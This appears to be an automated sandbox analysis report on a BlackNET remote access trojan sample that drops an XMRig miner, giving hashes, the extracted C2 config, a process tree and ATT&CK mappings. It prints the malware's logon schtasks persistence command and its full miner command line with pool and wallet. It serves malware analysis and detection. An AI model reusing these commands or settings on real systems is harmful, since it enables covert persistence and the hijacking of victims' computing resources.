blacknet | 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c

Analysis

max time kernel
151s
max time network
154s
platform
windows10_x64
resource
win10v20210408
submitted
23-07-2021 00:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
Size

3.2MB
MD5

af711c6269728cc41a4b6cab99dc00d2
SHA1

02a1cff69f43552c5aa6fea7547e5f68018dbc84
SHA256

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c
SHA512

94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6

Score

10^/10

blacknet xmrig otwjgz miner trojan

Malware Config

Extracted

Family

blacknet

Version

v3.7.0 Public

Botnet

OTwjgZ

http://54.237.66.139

Mutex

BN[a4bfa882efc194e2bcd370ea]

Attributes

antivm
false
elevate_uac
false
install_name
WindowsUpdate.exe
splitter
|BN|
start_name
19eb68018edbdeae69b26450d3d0915f
startup
false
usb_spread
false

Signatures

BlackNET
BlackNET is an open source remote access tool written in VB.NET.
trojan blacknet

BlackNET Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp	family_blacknet
behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp	family_blacknet
C:\Users\Admin\AppData\Local\Temp\phone.exe	family_blacknet
C:\Users\Admin\AppData\Local\Temp\phone.exe	family_blacknet

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp	disable_win_def
behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp	disable_win_def
C:\Users\Admin\AppData\Local\Temp\phone.exe	disable_win_def
C:\Users\Admin\AppData\Local\Temp\phone.exe	disable_win_def

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1808-189-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

cmd.exe

flow pid process

19 1808 cmd.exe
21 1808 cmd.exe
Executes dropped EXE 5 IoCs

Processes:

phone.exephoneupdate.exesihost64.exeuserupdate.exesihost64.exe

pid process

488 phone.exe
3852 phoneupdate.exe
764 sihost64.exe
644 userupdate.exe
1508 sihost64.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
19	1808	cmd.exe
21	1808	cmd.exe

pid	process
488	phone.exe
3852	phoneupdate.exe
764	sihost64.exe
644	userupdate.exe
1508	sihost64.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exeuserupdate.exe

description	pid	process	target process
PID 992 set thread context of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 644 set thread context of 1808	644	userupdate.exe	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3544 schtasks.exe
2796 schtasks.exe

pid	process
3544	schtasks.exe
2796	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exephone.exephoneupdate.exeuserupdate.exe

pid	process
992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
488	phone.exe
3852	phoneupdate.exe
3852	phoneupdate.exe
644	userupdate.exe
644	userupdate.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exephone.exephoneupdate.exeuserupdate.execmd.exe

description	pid	process
Token: SeDebugPrivilege	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
Token: SeDebugPrivilege	488	phone.exe
Token: SeDebugPrivilege	3852	phoneupdate.exe
Token: SeDebugPrivilege	644	userupdate.exe
Token: SeLockMemoryPrivilege	1808	cmd.exe
Token: SeLockMemoryPrivilege	1808	cmd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

phone.exe

pid process

488 phone.exe
488 phone.exe

pid	process
488	phone.exe
488	phone.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exevbc.exephoneupdate.execmd.exeuserupdate.execmd.exe

description	pid	process	target process
PID 992 wrote to memory of 2268	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 2268	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 2268	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 992 wrote to memory of 1568	992	4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe	vbc.exe
PID 1568 wrote to memory of 488	1568	vbc.exe	phone.exe
PID 1568 wrote to memory of 488	1568	vbc.exe	phone.exe
PID 1568 wrote to memory of 3852	1568	vbc.exe	phoneupdate.exe
PID 1568 wrote to memory of 3852	1568	vbc.exe	phoneupdate.exe
PID 3852 wrote to memory of 408	3852	phoneupdate.exe	cmd.exe
PID 3852 wrote to memory of 408	3852	phoneupdate.exe	cmd.exe
PID 408 wrote to memory of 3544	408	cmd.exe	schtasks.exe
PID 408 wrote to memory of 3544	408	cmd.exe	schtasks.exe
PID 3852 wrote to memory of 764	3852	phoneupdate.exe	sihost64.exe
PID 3852 wrote to memory of 764	3852	phoneupdate.exe	sihost64.exe
PID 3852 wrote to memory of 644	3852	phoneupdate.exe	userupdate.exe
PID 3852 wrote to memory of 644	3852	phoneupdate.exe	userupdate.exe
PID 644 wrote to memory of 2204	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 2204	644	userupdate.exe	cmd.exe
PID 2204 wrote to memory of 2796	2204	cmd.exe	schtasks.exe
PID 2204 wrote to memory of 2796	2204	cmd.exe	schtasks.exe
PID 644 wrote to memory of 1508	644	userupdate.exe	sihost64.exe
PID 644 wrote to memory of 1508	644	userupdate.exe	sihost64.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe
PID 644 wrote to memory of 1808	644	userupdate.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
"C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"{path}"
2⤵
PID:2268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"{path}"
2⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Users\Admin\AppData\Local\Temp\phone.exe
"C:\Users\Admin\AppData\Local\Temp\phone.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:488

C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
"C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
5⤵
- Creates scheduled task(s)
PID:3544

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:764

C:\Users\Admin\AppData\Roaming\userupdate.exe
"C:\Users\Admin\AppData\Roaming\userupdate.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
6⤵
- Creates scheduled task(s)
PID:2796

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
- Executes dropped EXE
PID:1508

C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\phone.exe
MD5
a18b7cb1fe97912ffc3e38d76ccc0462

SHA1
c5908c111223d69f532973643381983ba385c1c1

SHA256
2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

SHA512
d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\phone.exe
MD5
a18b7cb1fe97912ffc3e38d76ccc0462

SHA1
c5908c111223d69f532973643381983ba385c1c1

SHA256
2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

SHA512
d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
MD5
c169f9a4c5c32e4ceb4ff58d1c86e969

SHA1
8cdad283c3c44202cb3dc50928d8f80ce885715c

SHA256
aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

SHA512
3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

Download Submit
C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
MD5
c169f9a4c5c32e4ceb4ff58d1c86e969

SHA1
8cdad283c3c44202cb3dc50928d8f80ce885715c

SHA256
aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

SHA512
3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
94de80b9dbb3379c59a370b83bbffd90

SHA1
9b65d5fba13c1174af142de9fdb17cd9989332fc

SHA256
5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

SHA512
1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
94de80b9dbb3379c59a370b83bbffd90

SHA1
9b65d5fba13c1174af142de9fdb17cd9989332fc

SHA256
5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

SHA512
1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
94de80b9dbb3379c59a370b83bbffd90

SHA1
9b65d5fba13c1174af142de9fdb17cd9989332fc

SHA256
5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

SHA512
1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
94de80b9dbb3379c59a370b83bbffd90

SHA1
9b65d5fba13c1174af142de9fdb17cd9989332fc

SHA256
5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

SHA512
1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

Download Submit
C:\Users\Admin\AppData\Roaming\userupdate.exe
MD5
c169f9a4c5c32e4ceb4ff58d1c86e969

SHA1
8cdad283c3c44202cb3dc50928d8f80ce885715c

SHA256
aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

SHA512
3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

Download Submit
C:\Users\Admin\AppData\Roaming\userupdate.exe
MD5
c169f9a4c5c32e4ceb4ff58d1c86e969

SHA1
8cdad283c3c44202cb3dc50928d8f80ce885715c

SHA256
aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

SHA512
3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

Download Submit
memory/408-162-0x0000000000000000-mapping.dmp

Download
memory/488-156-0x000002B777510000-0x000002B777512000-memory.dmp

Filesize
8KB

Download
memory/488-141-0x0000000000000000-mapping.dmp

Download
memory/488-148-0x000002B75CF50000-0x000002B75CF51000-memory.dmp

Filesize
4KB

Download
memory/488-159-0x000002B777515000-0x000002B777517000-memory.dmp

Filesize
8KB

Download
memory/488-158-0x000002B777512000-0x000002B777513000-memory.dmp

Filesize
4KB

Download
memory/488-157-0x000002B777513000-0x000002B777514000-memory.dmp

Filesize
4KB

Download
memory/644-180-0x00000000013D0000-0x00000000013D1000-memory.dmp

Filesize
4KB

Download
memory/644-177-0x000000001C620000-0x000000001C622000-memory.dmp

Filesize
8KB

Download
memory/644-167-0x0000000000000000-mapping.dmp

Download
memory/644-187-0x00000000013C0000-0x00000000013CA000-memory.dmp

Filesize
40KB

Download
memory/764-168-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/764-164-0x0000000000000000-mapping.dmp

Download
memory/764-176-0x000000001C2A0000-0x000000001C2A2000-memory.dmp

Filesize
8KB

Download
memory/764-174-0x0000000000F90000-0x0000000000F92000-memory.dmp

Filesize
8KB

Download
memory/992-122-0x0000000005DE0000-0x0000000006076000-memory.dmp

Filesize
2.6MB

Download
memory/992-121-0x0000000004690000-0x0000000004692000-memory.dmp

Filesize
8KB

Download
memory/992-116-0x0000000007530000-0x0000000007531000-memory.dmp

Filesize
4KB

Download
memory/992-117-0x00000000070D0000-0x00000000070D1000-memory.dmp

Filesize
4KB

Download
memory/992-118-0x0000000007030000-0x000000000752E000-memory.dmp

Filesize
5.0MB

Download
memory/992-119-0x0000000007230000-0x0000000007231000-memory.dmp

Filesize
4KB

Download
memory/992-120-0x0000000009510000-0x0000000009511000-memory.dmp

Filesize
4KB

Download
memory/992-114-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/992-123-0x0000000006510000-0x0000000006754000-memory.dmp

Filesize
2.3MB

Download
memory/1508-181-0x0000000000000000-mapping.dmp

Download
memory/1508-196-0x000000001BF00000-0x000000001BF02000-memory.dmp

Filesize
8KB

Download
memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp

Filesize
2.2MB

Download
memory/1568-136-0x0000000009C60000-0x0000000009C61000-memory.dmp

Filesize
4KB

Download
memory/1568-125-0x000000000063636E-mapping.dmp

Download
memory/1568-134-0x0000000009AA0000-0x0000000009F9E000-memory.dmp

Filesize
5.0MB

Download
memory/1808-194-0x00000193343C0000-0x00000193343E0000-memory.dmp

Filesize
128KB

Download
memory/1808-197-0x00000193343E0000-0x0000019334400000-memory.dmp

Filesize
128KB

Download
memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1808-189-0x00000001402EB66C-mapping.dmp

Download
memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1808-190-0x0000019332AE0000-0x0000019332B00000-memory.dmp

Filesize
128KB

Download
memory/2204-178-0x0000000000000000-mapping.dmp

Download
memory/2796-179-0x0000000000000000-mapping.dmp

Download
memory/3544-163-0x0000000000000000-mapping.dmp

Download
memory/3852-161-0x000000001C2F0000-0x000000001C2F2000-memory.dmp

Filesize
8KB

Download
memory/3852-160-0x000000001C700000-0x000000001C91B000-memory.dmp

Filesize
2.1MB

Download
memory/3852-153-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/3852-150-0x0000000000000000-mapping.dmp

Download